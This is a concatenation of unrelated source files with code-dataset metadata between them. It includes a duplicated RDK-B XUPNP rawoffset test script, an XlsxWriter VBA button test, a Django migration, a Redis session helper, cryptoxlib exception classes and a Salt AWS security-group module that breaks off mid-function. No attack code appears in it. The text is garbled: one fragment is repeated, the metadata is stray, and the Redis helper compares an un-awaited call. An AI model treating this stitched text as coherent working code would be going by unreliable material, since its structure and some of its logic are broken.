<long_duration>false</long_duration> <advanced_script>false</advanced_script> <remarks/> <skip>false</skip> <box_types> <box_type>Broadband</box_type> </box_types> <rdk_versions> <rdk_version>RDKB</rdk_version> </rdk_versions> <test_cases> <test_case_id>TC_XUPNP_13</test_case_id> <test_objective>To get all the rawoffset parameters in the output.json file from DUT and validate them by comparing with rawoffset parameters in the output.json file from the clients connected.</test_objective> <test_type>Positive</test_type> <test_setup>Broadband</test_setup> <pre_requisite>TDK Agent should be in running state for 
both DUT and clients connected or invoke it through StartTdk.sh script.</pre_requisite> <api_or_interface_used>None</api_or_interface_used> <input_parameters>None</input_parameters> <automation_approch>1. Load xupnp module. 2. Get the output.json file output from DUT and parse the output with bcastMacAddress:rawoffset mapping and store it. 3. Get the output.json file output from clients and parse the output with bcastMacAddress:rawoffset mapping and store it. 4. Compare the both the outputs. 5. If equal return SUCCESS, else FAILURE. 6.Unload xupnp module.</automation_approch> <expected_output>All rawoffset parameters retrieved from DUT and clients should be equal.</expected_output> <priority>High</priority> <test_stub_interface>xupnp</test_stub_interface> <test_script>TS_XUPNP_B_RawoffsetValidation</test_script> <skipped>No</skipped> <release_version>M70</release_version> <remarks/> </test_cases> </xml> ''' # use tdklib library,which provides a wrapper for tdk testcase script import tdklib; from xupnplib import *; #Test component to be tested obj = tdklib.TDKScriptingLibrary("xupnp","1"); #IP and Port of box, No need to change, #This will be replaced with correspoing Box Ip and port while executing script ip = <ipaddress> port = <port> obj.configureTestCase(ip,port,'TS_XUPNP_B_RawoffsetValidation'); #Get the result of connection with test component and STB loadmodulestatus=obj.getLoadModuleResult(); print "[LIB LOAD STATUS] : %s" %loadmodulestatus; if "SUCCESS" in loadmodulestatus.upper() : #Set the result status of execution obj.setLoadModuleStatus("SUCCESS"); tdkTestObj = obj.createTestStep("XUPNPStub_CheckXDiscOutputFile"); expectedresult = "SUCCESS"; tdkTestObj.executeTestCase(expectedresult); actualresult = tdkTestObj.getResult(); details = tdkTestObj.getResultDetails(); if expectedresult in actualresult : tdkTestObj.setResultStatus("SUCCESS"); logpath = details.split(" ")[0]; print "\n\n\n**************XUPNP DUT LOG TRANSFER - BEGIN*************\n\n" print 
"Transfering output log file : %s from DUT"%logpath; logpath = tdkTestObj.transferLogs(logpath, "false"); print "Local file path of Testrunner output log : %s" %logpath; info = open(logpath,'r'); output = info.read(); dictionary = LogParser(output,"rawoffset"); info.close() print "\n**************XUPNP DUT LOG TRANSFER - END*************\n\n" clientip_logfile_dic,NO_OF_CLIENTS = TransferLogsParser(obj); if len(dictionary) == NO_OF_CLIENTS + 1 : tdkTestObj.setResultStatus("SUCCESS"); print "All the connected clients data is populated in output.json file"; for key in clientip_logfile_dic : print "\n********XUPNP CLIENT WITH IP : %s LOG TRANSFER - BEGIN********\n\n"%key; print "Transfering output log file : %s from client with ip : %s"%(clientip_logfile_dic.get(key),key); filepath = tdkTestObj.transferLogs_from_box(key,clientip_logfile_dic.get(key), "false") print "Local file path of Testrunner output log : %s" %filepath; data = open(filepath,'r'); message = data.read() cli_dictionary = LogParser(message,"rawoffset"); print "\n********XUPNP CLIENT WITH IP : %s LOG TRANSFER - END********\n\n"%key; print "\n**************XUPNP OUTPUT - BEGIN*************\n\n" for key in dictionary : if dictionary.get(key) == cli_dictionary.get(key): tdkTestObj.setResultStatus("SUCCESS"); print "TEST STEP : Compare whether the rawoffset parameters from DUT and connected client are equal"; print "EXPECTED RESULT : The rawoffset parameters from DUT and connected client should be equal"; print "ACTUAL RESULT : The rawoffset is %s for corresponding %s bcastMacAddress"%(dictionary.get(key),key); print "[TEST EXECUTION RESULT] : SUCCESS"; print "\n********************************************************************************************\n"; else : tdkTestObj.setResultStatus("FAILURE"); print "TEST STEP : Compare whether the rawoffset parameters from DUT and connected client are equal"; print "EXPECTED RESULT : The rawoffset parameters from DUT and connected client should be equal"; print 
"ACTUAL RESULT : The rawoffset is %s for corresponding %s bcastMacAddress"%(dictionary.get(key),key); print "[TEST EXECUTION RESULT] : FAILURE"; print "\n********************************************************************************************\n"; data.close() print "\n**************XUPNP OUTPUT - END*************\n\n" else : tdkTestObj.setResultStatus("FAILURE"); print "All the connected clients data is NOT populated in output.json file"; else : tdkTestObj.setResultStatus("FAILURE"); print "Failed to get output.json file path from DUT"; print "DETAILS :",details; #Unload upnp module obj.unloadModule("xupnp"); else: print "Failed to load upnp module"; obj.setLoadModuleStatus("FAILURE"); print "Module loading failed";
54.972789
214
0.604999
terface> <test_script>TS_XUPNP_B_RawoffsetValidation</test_script> <skipped>No</skipped> <release_version>M70</release_version> <remarks/> </test_cases> </xml> ''' # use tdklib library,which provides a wrapper for tdk testcase script import tdklib; from xupnplib import *; #Test component to be tested obj = tdklib.TDKScriptingLibrary("xupnp","1"); #IP and Port of box, No need to change, #This will be replaced with correspoing Box Ip and port while executing script ip = <ipaddress> port = <port> obj.configureTestCase(ip,port,'TS_XUPNP_B_RawoffsetValidation'); #Get the result of connection with test component and STB loadmodulestatus=obj.getLoadModuleResult(); print "[LIB LOAD STATUS] : %s" %loadmodulestatus; if "SUCCESS" in loadmodulestatus.upper() : #Set the result status of execution obj.setLoadModuleStatus("SUCCESS"); tdkTestObj = obj.createTestStep("XUPNPStub_CheckXDiscOutputFile"); expectedresult = "SUCCESS"; tdkTestObj.executeTestCase(expectedresult); actualresult = tdkTestObj.getResult(); details = tdkTestObj.getResultDetails(); if expectedresult in actualresult : tdkTestObj.setResultStatus("SUCCESS"); logpath = details.split(" ")[0]; print "\n\n\n**************XUPNP DUT LOG TRANSFER - BEGIN*************\n\n" print "Transfering output log file : %s from DUT"%logpath; logpath = tdkTestObj.transferLogs(logpath, "false"); print "Local file path of Testrunner output log : %s" %logpath; info = open(logpath,'r'); output = info.read(); dictionary = LogParser(output,"rawoffset"); info.close() print "\n**************XUPNP DUT LOG TRANSFER - END*************\n\n" clientip_logfile_dic,NO_OF_CLIENTS = TransferLogsParser(obj); if len(dictionary) == NO_OF_CLIENTS + 1 : tdkTestObj.setResultStatus("SUCCESS"); print "All the connected clients data is populated in output.json file"; for key in clientip_logfile_dic : print "\n********XUPNP CLIENT WITH IP : %s LOG TRANSFER - BEGIN********\n\n"%key; print "Transfering output log file : %s from client with ip : 
%s"%(clientip_logfile_dic.get(key),key); filepath = tdkTestObj.transferLogs_from_box(key,clientip_logfile_dic.get(key), "false") print "Local file path of Testrunner output log : %s" %filepath; data = open(filepath,'r'); message = data.read() cli_dictionary = LogParser(message,"rawoffset"); print "\n********XUPNP CLIENT WITH IP : %s LOG TRANSFER - END********\n\n"%key; print "\n**************XUPNP OUTPUT - BEGIN*************\n\n" for key in dictionary : if dictionary.get(key) == cli_dictionary.get(key): tdkTestObj.setResultStatus("SUCCESS"); print "TEST STEP : Compare whether the rawoffset parameters from DUT and connected client are equal"; print "EXPECTED RESULT : The rawoffset parameters from DUT and connected client should be equal"; print "ACTUAL RESULT : The rawoffset is %s for corresponding %s bcastMacAddress"%(dictionary.get(key),key); print "[TEST EXECUTION RESULT] : SUCCESS"; print "\n********************************************************************************************\n"; else : tdkTestObj.setResultStatus("FAILURE"); print "TEST STEP : Compare whether the rawoffset parameters from DUT and connected client are equal"; print "EXPECTED RESULT : The rawoffset parameters from DUT and connected client should be equal"; print "ACTUAL RESULT : The rawoffset is %s for corresponding %s bcastMacAddress"%(dictionary.get(key),key); print "[TEST EXECUTION RESULT] : FAILURE"; print "\n********************************************************************************************\n"; data.close() print "\n**************XUPNP OUTPUT - END*************\n\n" else : tdkTestObj.setResultStatus("FAILURE"); print "All the connected clients data is NOT populated in output.json file"; else : tdkTestObj.setResultStatus("FAILURE"); print "Failed to get output.json file path from DUT"; print "DETAILS :",details; #Unload upnp module obj.unloadModule("xupnp"); else: print "Failed to load upnp module"; obj.setLoadModuleStatus("FAILURE"); print "Module loading failed";
false
true
f705e0706875e8cf396e8b98af019ceeec2c23b1
1,971
py
Python
xlsxwriter/test/comparison/test_button07.py
dthadi3/XlsxWriter
f1801e82240aa9c746ce14948ef95990b83162cf
[ "BSD-2-Clause-FreeBSD" ]
1
2020-07-01T07:24:37.000Z
2020-07-01T07:24:37.000Z
xlsxwriter/test/comparison/test_button07.py
dthadi3/XlsxWriter
f1801e82240aa9c746ce14948ef95990b83162cf
[ "BSD-2-Clause-FreeBSD" ]
null
null
null
xlsxwriter/test/comparison/test_button07.py
dthadi3/XlsxWriter
f1801e82240aa9c746ce14948ef95990b83162cf
[ "BSD-2-Clause-FreeBSD" ]
null
null
null
############################################################################### # # Tests for XlsxWriter. # # Copyright (c), 2013-2020, John McNamara, jmcnamara@cpan.org # from ..excel_comparison_test import ExcelComparisonTest from ...workbook import Workbook class TestCompareXLSXFiles(ExcelComparisonTest): """ Test file created by XlsxWriter against a file created by Excel. """ def setUp(self): self.set_filename('button07.xlsm') def test_create_file(self): """Test the creation of a simple XlsxWriter file.""" workbook = Workbook(self.got_filename) worksheet = workbook.add_worksheet() workbook.set_vba_name() worksheet.set_vba_name() worksheet.insert_button('C2', {'macro': 'say_hello', 'caption': 'Hello'}) workbook.add_vba_project(self.vba_dir + 'vbaProject02.bin') workbook.close() self.assertExcelEqual() def test_create_file_explicit_vba_names(self): """Test the creation of a simple XlsxWriter file.""" workbook = Workbook(self.got_filename) worksheet = workbook.add_worksheet() workbook.set_vba_name('ThisWorkbook') worksheet.set_vba_name('Sheet1') worksheet.insert_button('C2', {'macro': 'say_hello', 'caption': 'Hello'}) workbook.add_vba_project(self.vba_dir + 'vbaProject02.bin') workbook.close() self.assertExcelEqual() def test_create_file_implicit_vba_names(self): """Test the creation of a simple XlsxWriter file.""" workbook = Workbook(self.got_filename) worksheet = workbook.add_worksheet() worksheet.insert_button('C2', {'macro': 'say_hello', 'caption': 'Hello'}) workbook.add_vba_project(self.vba_dir + 'vbaProject02.bin') workbook.close() self.assertExcelEqual()
26.28
79
0.598681
true
true
f705e11b73b8ab51a2717f76d0f1699b82a7b0ae
258
py
Python
biot/core/fan.py
AroliantBIoT/biot-orangepi-client
60df602816cdc0c668e58f91512e93eb5bec3c6d
[ "MIT" ]
null
null
null
biot/core/fan.py
AroliantBIoT/biot-orangepi-client
60df602816cdc0c668e58f91512e93eb5bec3c6d
[ "MIT" ]
null
null
null
biot/core/fan.py
AroliantBIoT/biot-orangepi-client
60df602816cdc0c668e58f91512e93eb5bec3c6d
[ "MIT" ]
null
null
null
class Fan(): """Default Device with ON / OFF Functions""" deviceID = None def __init__(self, deviceID): if deviceID is None: print("Provide a Device ID") return self.deviceID = deviceID def setSpeed(self): pass def getSpeed(self): pass
16.125
45
0.678295
class Fan(): deviceID = None def __init__(self, deviceID): if deviceID is None: print("Provide a Device ID") return self.deviceID = deviceID def setSpeed(self): pass def getSpeed(self): pass
true
true
f705e133aa7892ba240c4677420a97b286673317
3,271
py
Python
projects_api/migrations/0001_initial.py
diegoinn/profile-rest-api
a5b8c9dfe5453db24e93d05367d33e6f37c65966
[ "MIT" ]
null
null
null
projects_api/migrations/0001_initial.py
diegoinn/profile-rest-api
a5b8c9dfe5453db24e93d05367d33e6f37c65966
[ "MIT" ]
null
null
null
projects_api/migrations/0001_initial.py
diegoinn/profile-rest-api
a5b8c9dfe5453db24e93d05367d33e6f37c65966
[ "MIT" ]
null
null
null
# Generated by Django 2.2 on 2020-10-29 04:23 from django.db import migrations, models import django.db.models.deletion class Migration(migrations.Migration): initial = True dependencies = [ ] operations = [ migrations.CreateModel( name='ConstructionSystem', fields=[ ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')), ('name_construction_system', models.CharField(max_length=255)), ], ), migrations.CreateModel( name='Material', fields=[ ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')), ('name_material', models.CharField(max_length=255)), ], ), migrations.CreateModel( name='Origin', fields=[ ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')), ('name_origin', models.CharField(max_length=255)), ], ), migrations.CreateModel( name='Project', fields=[ ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')), ('name_project', models.CharField(max_length=255)), ('use', models.CharField(max_length=255)), ('builded_surface', models.IntegerField()), ('living_area', models.IntegerField()), ('tier', models.IntegerField()), ('useful_life', models.IntegerField()), ], ), migrations.CreateModel( name='Section', fields=[ ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')), ('name_section', models.CharField(max_length=255)), ], ), migrations.CreateModel( name='Unit', fields=[ ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')), ('name_unit', models.CharField(max_length=255)), ], ), migrations.CreateModel( name='MaterialSchemeProject', fields=[ ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')), ('quantity', models.IntegerField()), ('provider_distance', models.IntegerField()), ('construction_system_id', models.ForeignKey(on_delete=django.db.models.deletion.DO_NOTHING, 
to='projects_api.ConstructionSystem')), ('material_id', models.ForeignKey(on_delete=django.db.models.deletion.DO_NOTHING, to='projects_api.Material')), ('origin_id', models.ForeignKey(on_delete=django.db.models.deletion.DO_NOTHING, to='projects_api.Origin')), ('project_id', models.ForeignKey(on_delete=django.db.models.deletion.DO_NOTHING, to='projects_api.Project')), ('unit_id', models.ForeignKey(on_delete=django.db.models.deletion.DO_NOTHING, to='projects_api.Unit')), ], ), ]
43.039474
148
0.578416
from django.db import migrations, models import django.db.models.deletion class Migration(migrations.Migration): initial = True dependencies = [ ] operations = [ migrations.CreateModel( name='ConstructionSystem', fields=[ ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')), ('name_construction_system', models.CharField(max_length=255)), ], ), migrations.CreateModel( name='Material', fields=[ ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')), ('name_material', models.CharField(max_length=255)), ], ), migrations.CreateModel( name='Origin', fields=[ ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')), ('name_origin', models.CharField(max_length=255)), ], ), migrations.CreateModel( name='Project', fields=[ ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')), ('name_project', models.CharField(max_length=255)), ('use', models.CharField(max_length=255)), ('builded_surface', models.IntegerField()), ('living_area', models.IntegerField()), ('tier', models.IntegerField()), ('useful_life', models.IntegerField()), ], ), migrations.CreateModel( name='Section', fields=[ ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')), ('name_section', models.CharField(max_length=255)), ], ), migrations.CreateModel( name='Unit', fields=[ ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')), ('name_unit', models.CharField(max_length=255)), ], ), migrations.CreateModel( name='MaterialSchemeProject', fields=[ ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')), ('quantity', models.IntegerField()), ('provider_distance', models.IntegerField()), ('construction_system_id', models.ForeignKey(on_delete=django.db.models.deletion.DO_NOTHING, to='projects_api.ConstructionSystem')), 
('material_id', models.ForeignKey(on_delete=django.db.models.deletion.DO_NOTHING, to='projects_api.Material')), ('origin_id', models.ForeignKey(on_delete=django.db.models.deletion.DO_NOTHING, to='projects_api.Origin')), ('project_id', models.ForeignKey(on_delete=django.db.models.deletion.DO_NOTHING, to='projects_api.Project')), ('unit_id', models.ForeignKey(on_delete=django.db.models.deletion.DO_NOTHING, to='projects_api.Unit')), ], ), ]
true
true
f705e1ac415f1541823e90e5a27d3686709724a5
370
py
Python
cryptoxlib/clients/aax/exceptions.py
PetrZufan/cryptoxlib-aio
8fbb817ee7a7a88693804e24877863370d1d53c7
[ "MIT" ]
90
2020-04-09T18:34:49.000Z
2022-03-09T14:29:32.000Z
cryptoxlib/clients/aax/exceptions.py
PetrZufan/cryptoxlib-aio
8fbb817ee7a7a88693804e24877863370d1d53c7
[ "MIT" ]
44
2020-04-03T17:02:20.000Z
2022-01-29T14:51:51.000Z
cryptoxlib/clients/aax/exceptions.py
PetrZufan/cryptoxlib-aio
8fbb817ee7a7a88693804e24877863370d1d53c7
[ "MIT" ]
28
2020-04-25T21:34:53.000Z
2022-03-31T07:20:07.000Z
from typing import Optional from cryptoxlib.exceptions import CryptoXLibException class AAXException(CryptoXLibException): pass class AAXRestException(AAXException): def __init__(self, status_code: int, body: Optional[dict]): super().__init__(f"Rest API exception: status [{status_code}], response [{body}]") self.status_code = status_code self.body = body
24.666667
84
0.778378
from typing import Optional from cryptoxlib.exceptions import CryptoXLibException class AAXException(CryptoXLibException): pass class AAXRestException(AAXException): def __init__(self, status_code: int, body: Optional[dict]): super().__init__(f"Rest API exception: status [{status_code}], response [{body}]") self.status_code = status_code self.body = body
true
true
f705e31f80b4e24a70351eb21bb89c4f68671a24
1,229
py
Python
service_api/domain/redis.py
123456789-dnipro/hackaton
7ad3017d31a1fe6c6cb72f2227e8a108a30a156b
[ "MIT" ]
null
null
null
service_api/domain/redis.py
123456789-dnipro/hackaton
7ad3017d31a1fe6c6cb72f2227e8a108a30a156b
[ "MIT" ]
1
2021-06-01T23:53:20.000Z
2021-06-01T23:53:20.000Z
service_api/domain/redis.py
123456789-dnipro/hackaton
7ad3017d31a1fe6c6cb72f2227e8a108a30a156b
[ "MIT" ]
null
null
null
import aioredis from sanic import Sanic class RedisWorker: def __init__(self): self.__host = None self.__pool = None async def init(self, app: Sanic): self.__host = app.config.REDIS_HOST self.__pool = await aioredis.create_redis(self.__host) async def check_session(self, token): return await self.__pool.expire(token, 300) async def set_conf_msg(self, phone, msg): await self.__pool.set(phone, msg) await self.__pool.expire(phone, 60) async def get_conf_msg(self, phone, msg): real_code = self.__pool.get(phone) if real_code == msg: self.__pool.delete(phone) return True else: return False async def get_user(self, token): return await self.__pool.get(token) async def create_session(self, user_id, token): cur_token = await self.__pool.get(user_id) if not cur_token: await self.__pool.set(token, user_id) await self.__pool.expire(token, 300) else: token = cur_token return token async def close(self): self.__pool.close() await self.__pool.wait_closed() redis = RedisWorker()
26.148936
62
0.62083
import aioredis from sanic import Sanic class RedisWorker: def __init__(self): self.__host = None self.__pool = None async def init(self, app: Sanic): self.__host = app.config.REDIS_HOST self.__pool = await aioredis.create_redis(self.__host) async def check_session(self, token): return await self.__pool.expire(token, 300) async def set_conf_msg(self, phone, msg): await self.__pool.set(phone, msg) await self.__pool.expire(phone, 60) async def get_conf_msg(self, phone, msg): real_code = self.__pool.get(phone) if real_code == msg: self.__pool.delete(phone) return True else: return False async def get_user(self, token): return await self.__pool.get(token) async def create_session(self, user_id, token): cur_token = await self.__pool.get(user_id) if not cur_token: await self.__pool.set(token, user_id) await self.__pool.expire(token, 300) else: token = cur_token return token async def close(self): self.__pool.close() await self.__pool.wait_closed() redis = RedisWorker()
true
true
f705e3f0d1abe21f5b92ea10cdd8b37a2a9906b1
15,509
py
Python
salt/modules/boto_secgroup.py
Achimh3011/salt
b6e6968c22f840df0d43bea7e99c188c623b850b
[ "Apache-2.0" ]
null
null
null
salt/modules/boto_secgroup.py
Achimh3011/salt
b6e6968c22f840df0d43bea7e99c188c623b850b
[ "Apache-2.0" ]
null
null
null
salt/modules/boto_secgroup.py
Achimh3011/salt
b6e6968c22f840df0d43bea7e99c188c623b850b
[ "Apache-2.0" ]
null
null
null
# -*- coding: utf-8 -*- ''' Connection module for Amazon Security Groups .. versionadded:: 2014.7.0 :configuration: This module accepts explicit ec2 credentials but can also utilize IAM roles assigned to the instance trough Instance Profiles. Dynamic credentials are then automatically obtained from AWS API and no further configuration is necessary. More Information available at:: http://docs.aws.amazon.com/AWSEC2/latest/UserGuide/iam-roles-for-amazon-ec2.html If IAM roles are not used you need to specify them either in a pillar or in the minion's config file:: secgroup.keyid: GKTADJGHEIQSXMKKRBJ08H secgroup.key: askdjghsdfjkghWupUjasdflkdfklgjsdfjajkghs A region may also be specified in the configuration:: secgroup.region: us-east-1 If a region is not specified, the default is us-east-1. It's also possible to specify key, keyid and region via a profile, either as a passed in dict, or as a string to pull from pillars or minion config: myprofile: keyid: GKTADJGHEIQSXMKKRBJ08H key: askdjghsdfjkghWupUjasdflkdfklgjsdfjajkghs region: us-east-1 :depends: boto ''' from __future__ import absolute_import # Import Python libs import logging import re from distutils.version import LooseVersion as _LooseVersion import six log = logging.getLogger(__name__) # Import third party libs try: import boto import boto.ec2 logging.getLogger('boto').setLevel(logging.CRITICAL) HAS_BOTO = True except ImportError: HAS_BOTO = False from six import string_types import salt.utils.odict as odict def __virtual__(): ''' Only load if boto libraries exist and if boto libraries are greater than a given version. 
''' required_boto_version = '2.4.0' # Boto < 2.4.0 GroupOrCIDR objects have different attributes than # Boto >= 2.4.0 GroupOrCIDR objects # Differences include no group_id attribute in Boto < 2.4.0 and returning # a groupId attribute when a GroupOrCIDR object authorizes an IP range # Support for Boto < 2.4.0 can be added if needed if not HAS_BOTO: return False elif _LooseVersion(boto.__version__) < _LooseVersion(required_boto_version): return False else: return True def exists(name=None, region=None, key=None, keyid=None, profile=None, vpc_id=None, group_id=None): ''' Check to see if an security group exists. CLI example:: salt myminion boto_secgroup.exists mysecgroup ''' conn = _get_conn(region, key, keyid, profile) if not conn: return False group = _get_group(conn, name, vpc_id, group_id, region) if group: return True else: return False def _split_rules(rules): ''' Split rules with combined grants into individual rules. Amazon returns a set of rules with the same protocol, from and to ports together as a single rule with a set of grants. Authorizing and revoking rules, however, is done as a split set of rules. This function splits the rules up. ''' split = [] for rule in rules: ip_protocol = rule.get('ip_protocol') to_port = rule.get('to_port') from_port = rule.get('from_port') grants = rule.get('grants') for grant in grants: _rule = {'ip_protocol': ip_protocol, 'to_port': to_port, 'from_port': from_port} for key, val in six.iteritems(grant): _rule[key] = val split.append(_rule) return split def _get_group(conn, name=None, vpc_id=None, group_id=None, region=None): ''' Get a group object given a name, name and vpc_id or group_id. Return a boto.ec2.securitygroup.SecurityGroup object if the group is found, else return None. 
''' if name: if vpc_id is None: log.debug('getting group for {0}'.format(name)) group_filter = {'group-name': name} filtered_groups = conn.get_all_security_groups(filters=group_filter) # security groups can have the same name if groups exist in both # EC2-Classic and EC2-VPC # iterate through groups to ensure we return the EC2-Classic # security group for group in filtered_groups: # a group in EC2-Classic will have vpc_id set to None if group.vpc_id is None: return group return None elif vpc_id: log.debug('getting group for {0} in vpc_id {1}'.format(name, vpc_id)) group_filter = {'group-name': name, 'vpc_id': vpc_id} filtered_groups = conn.get_all_security_groups(filters=group_filter) if len(filtered_groups) == 1: return filtered_groups[0] else: return None else: return None elif group_id: try: groups = conn.get_all_security_groups(group_ids=[group_id]) except boto.exception.BotoServerError as e: log.debug(e) return None if len(groups) == 1: return groups[0] else: return None else: return None def get_group_id(name, vpc_id=None, region=None, key=None, keyid=None, profile=None): ''' Get a Group ID given a Group Name or Group Name and VPC ID CLI example:: salt myminion boto_secgroup.get_group_id mysecgroup ''' conn = _get_conn(region, key, keyid, profile) if not conn: return False group = _get_group(conn, name, vpc_id, region) if group: return group.id else: return False def convert_to_group_ids(groups, vpc_id, region=None, key=None, keyid=None, profile=None): ''' Given a list of security groups and a vpc_id, convert_to_group_ids will convert all list items in the given list to security group ids. CLI example:: salt myminion boto_secgroup.convert_to_group_ids mysecgroup vpc-89yhh7h ''' log.debug('security group contents {0} pre-conversion'.format(groups)) group_ids = [] for group in groups: if re.match('sg-.*', group): log.debug('group {0} is a group id. get_group_id not called.' 
.format(group)) group_ids.append(group) else: log.debug('calling boto_secgroup.get_group_id for' ' group name {0}'.format(group)) group_id = get_group_id(group, vpc_id, region, key, keyid, profile) log.debug('group name {0} has group id {1}'.format( group, group_id) ) group_ids.append(str(group_id)) log.debug('security group contents {0} post-conversion'.format(group_ids)) return group_ids def get_config(name=None, group_id=None, region=None, key=None, keyid=None, profile=None, vpc_id=None): ''' Get the configuration for a security group. CLI example:: salt myminion boto_secgroup.get_config mysecgroup ''' conn = _get_conn(region, key, keyid, profile) if not conn: return None sg = _get_group(conn, name, vpc_id, group_id, region) if sg: ret = odict.OrderedDict() ret['name'] = sg.name # TODO: add support for vpc_id in return # ret['vpc_id'] = sg.vpc_id ret['group_id'] = sg.id ret['owner_id'] = sg.owner_id ret['description'] = sg.description # TODO: add support for tags _rules = [] for rule in sg.rules: log.debug('examining rule {0} for group {1}'.format(rule, sg.id)) attrs = ['ip_protocol', 'from_port', 'to_port', 'grants'] _rule = odict.OrderedDict() for attr in attrs: val = getattr(rule, attr) if not val: continue if attr == 'grants': _grants = [] for grant in val: log.debug('examining grant {0} for'.format(grant)) g_attrs = {'name': 'source_group_name', 'owner_id': 'source_group_owner_id', 'group_id': 'source_group_group_id', 'cidr_ip': 'cidr_ip'} _grant = odict.OrderedDict() for g_attr, g_attr_map in six.iteritems(g_attrs): g_val = getattr(grant, g_attr) if not g_val: continue _grant[g_attr_map] = g_val _grants.append(_grant) _rule['grants'] = _grants elif attr == 'from_port': _rule[attr] = int(val) elif attr == 'to_port': _rule[attr] = int(val) else: _rule[attr] = val _rules.append(_rule) ret['rules'] = _split_rules(_rules) return ret else: return None def create(name, description, vpc_id=None, region=None, key=None, keyid=None, profile=None): ''' Create an 
autoscale group. CLI example:: salt myminion boto_secgroup.create mysecgroup 'My Security Group' ''' conn = _get_conn(region, key, keyid, profile) if not conn: return False created = conn.create_security_group(name, description, vpc_id) if created: log.info('Created security group {0}.'.format(name)) return True else: msg = 'Failed to create security group {0}.'.format(name) log.error(msg) return False def delete(name=None, group_id=None, region=None, key=None, keyid=None, profile=None, vpc_id=None): ''' Delete an autoscale group. CLI example:: salt myminion boto_secgroup.delete mysecgroup ''' conn = _get_conn(region, key, keyid, profile) if not conn: return False group = _get_group(conn, name, vpc_id, group_id, region) if group: deleted = conn.delete_security_group(group_id=group.id) if deleted: log.info('Deleted security group {0} with id {1}.'.format(group.name, group.id)) return True else: msg = 'Failed to delete security group {0}.'.format(name) log.error(msg) return False else: log.debug('Security group not found.') return False def authorize(name=None, source_group_name=None, source_group_owner_id=None, ip_protocol=None, from_port=None, to_port=None, cidr_ip=None, group_id=None, source_group_group_id=None, region=None, key=None, keyid=None, profile=None, vpc_id=None): ''' Add a new rule to an existing security group. 
CLI example:: salt myminion boto_secgroup.authorize mysecgroup ip_protocol=tcp from_port=80 to_port=80 cidr_ip='['10.0.0.0/8', '192.168.0.0/24']' ''' conn = _get_conn(region, key, keyid, profile) if not conn: return False group = _get_group(conn, name, vpc_id, group_id, region) if group: try: added = conn.authorize_security_group( src_security_group_name=source_group_name, src_security_group_owner_id=source_group_owner_id, ip_protocol=ip_protocol, from_port=from_port, to_port=to_port, cidr_ip=cidr_ip, group_id=group.id, src_security_group_group_id=source_group_group_id) if added: log.info('Added rule to security group {0} with id {1}' .format(group.name, group.id)) return True else: msg = ('Failed to add rule to security group {0} with id {1}.' .format(group.name, group.id)) log.error(msg) return False except boto.exception.EC2ResponseError as e: log.debug(e) msg = ('Failed to add rule to security group {0} with id {1}.' .format(group.name, group.id)) log.error(msg) return False else: log.debug('Failed to add rule to security group.') return False def revoke(name=None, source_group_name=None, source_group_owner_id=None, ip_protocol=None, from_port=None, to_port=None, cidr_ip=None, group_id=None, source_group_group_id=None, region=None, key=None, keyid=None, profile=None, vpc_id=None): ''' Remove a rule from an existing security group. CLI example:: salt myminion boto_secgroup.revoke mysecgroup ip_protocol=tcp from_port=80 to_port=80 cidr_ip='10.0.0.0/8' ''' conn = _get_conn(region, key, keyid, profile) if not conn: return False group = _get_group(conn, name, vpc_id, group_id, region) if group: try: revoked = conn.revoke_security_group( src_security_group_name=source_group_name, src_security_group_owner_id=source_group_owner_id, ip_protocol=ip_protocol, from_port=from_port, to_port=to_port, cidr_ip=cidr_ip, group_id=group.id, src_security_group_group_id=source_group_group_id) if revoked: log.info('Removed rule from security group {0} with id {1}.' 
.format(group.name, group.id)) return True else: msg = ('Failed to remove rule from security group {0} with id {1}.' .format(group.name, group.id)) log.error(msg) return False except boto.exception.EC2ResponseError as e: log.debug(e) msg = ('Failed to remove rule from security group {0} with id {1}.' .format(group.name, group.id)) log.error(msg) return False else: log.debug('Failed to remove rule from security group.') return False def _get_conn(region, key, keyid, profile): ''' Get a boto connection to ec2. ''' if profile: if isinstance(profile, string_types): _profile = __salt__['config.option'](profile) elif isinstance(profile, dict): _profile = profile key = _profile.get('key', None) keyid = _profile.get('keyid', None) region = _profile.get('region', None) if not region and __salt__['config.option']('secgroup.region'): region = __salt__['config.option']('secgroup.region') if not region: region = 'us-east-1' if not key and __salt__['config.option']('secgroup.key'): key = __salt__['config.option']('secgroup.key') if not keyid and __salt__['config.option']('secgroup.keyid'): keyid = __salt__['config.option']('secgroup.keyid') try: conn = boto.ec2.connect_to_region(region, aws_access_key_id=keyid, aws_secret_access_key=key) except boto.exception.NoAuthHandlerFound: log.error('No authentication credentials found when attempting to' ' make ec2 connection for security groups.') return None return conn
35.009029
139
0.59488
from __future__ import absolute_import import logging import re from distutils.version import LooseVersion as _LooseVersion import six log = logging.getLogger(__name__) try: import boto import boto.ec2 logging.getLogger('boto').setLevel(logging.CRITICAL) HAS_BOTO = True except ImportError: HAS_BOTO = False from six import string_types import salt.utils.odict as odict def __virtual__(): required_boto_version = '2.4.0' if not HAS_BOTO: return False elif _LooseVersion(boto.__version__) < _LooseVersion(required_boto_version): return False else: return True def exists(name=None, region=None, key=None, keyid=None, profile=None, vpc_id=None, group_id=None): conn = _get_conn(region, key, keyid, profile) if not conn: return False group = _get_group(conn, name, vpc_id, group_id, region) if group: return True else: return False def _split_rules(rules): split = [] for rule in rules: ip_protocol = rule.get('ip_protocol') to_port = rule.get('to_port') from_port = rule.get('from_port') grants = rule.get('grants') for grant in grants: _rule = {'ip_protocol': ip_protocol, 'to_port': to_port, 'from_port': from_port} for key, val in six.iteritems(grant): _rule[key] = val split.append(_rule) return split def _get_group(conn, name=None, vpc_id=None, 